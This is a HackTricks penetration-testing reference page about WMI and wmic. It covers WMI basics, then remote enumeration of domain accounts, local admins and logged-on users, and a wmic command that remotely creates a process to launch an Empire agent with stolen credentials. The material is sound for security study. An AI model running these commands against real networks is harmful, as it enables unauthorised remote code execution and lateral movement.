hacktricks/windows/ntlm/wmicexec.md
carlospolop 4c796b9bb3 Revert "Ad hacktricks sponsoring"
This reverts commit c2c270feef.
2022-04-28 16:41:46 +01:00

5 KiB

WmicExec

How Does it works

Wmi allows to open process in hosts where you know username/password/Hash. Then, Wmiexec uses wmi to execute each command that is asked to execute this is why Wmicexec gives you semi-interactive shell.

dcomexec.py: This script gives a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints ShellBrowserWindow DCOM object. Currently, it supports MMC20. Application, Shell Windows and Shell Browser Window objects. from [here](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

WMI Basics

Namespace

WMI is divided into a directory-style hierarchy, the \root container, with other directories under \root. These "directory paths" are called namespaces.
List namespaces:

#Get Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

#List all namespaces (you may need administrator to list all of them)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

#List namespaces inside "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace

List classes of a namespace with:

gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse

Classes

The WMI class name eg: win32_process is a starting point for any WMI action. We always need to know a Class Name and the Namespace where it is located.
List classes starting with win32:

Get-WmiObject -Recurse -List -class win32* | more #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"

Call a class:

#When you don't specify a namespaces by default is "root/cimv2"
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus

Methods

WMI classes have one or more functions that can be executed. These functions are called methods.

#Load a class using [wmiclass], leist methods and call one
$c = [wmiclass]"win32_share"
$c.methods
#Find information about the class in https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-share
$c.Create("c:\share\path","name",0,$null,"My Description")
#If returned value is "0", then it was successfully executed
#List methods
Get-WmiObject -Query 'Select * From Meta_Class WHERE __Class LIKE "win32%"' | Where-Object { $_.PSBase.Methods } | Select-Object Name, Methods
#Call create method from win32_share class
Invoke-WmiMethod -Class win32_share -Name Create -ArgumentList @($null, "Description", $null, "Name", $null, "c:\share\path",0)

WMI Enumeration

Check WMI service

This how you can check if WMI service is running:

#Check if WMI service is running
Get-Service Winmgmt
Status   Name               DisplayName
------   ----               -----------
Running  Winmgmt            Windows Management Instrumentation

#From CMD
net start | findstr "Instrumentation"

System Information

Get-WmiObject -ClassName win32_operatingsystem | select * | more

Process Information

Get-WmiObject win32_process | Select Name, Processid

From an attacker's perspective, WMI can be very valuable in enumerating sensitive information about a system or the domain.

wmic computerystem list full /format:list  
wmic process list /format:list  
wmic ntdomain list /format:list  
wmic useraccount list /format:list  
wmic group list /format:list  
wmic sysaccount list /format:list  
 Get-WmiObject Win32_Processor -ComputerName 10.0.0.182 -Credential $cred

Manual Remote WMI Querying

For example, here's a very stealthy way to discover local admins on a remote machine note that domain is the computer name:

wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")  

Another useful oneliner is to see who is logged on to a machine for when you're hunting admins:

wmic /node:ordws01 path win32_loggedonuser get antecedent  

wmic can even read nodes from a text file and execute the command on all of them. If you have a text file of workstations:

wmic /node:@workstations.txt path win32_loggedonuser get antecedent  

We'll remotely create a process over WMI to execute a Empire agent:

wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"  

We see it executed successfully ReturnValue = 0. And a second later our Empire listener catches it. Note the process ID is the same as WMI returned.

All this information was extracted from here: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/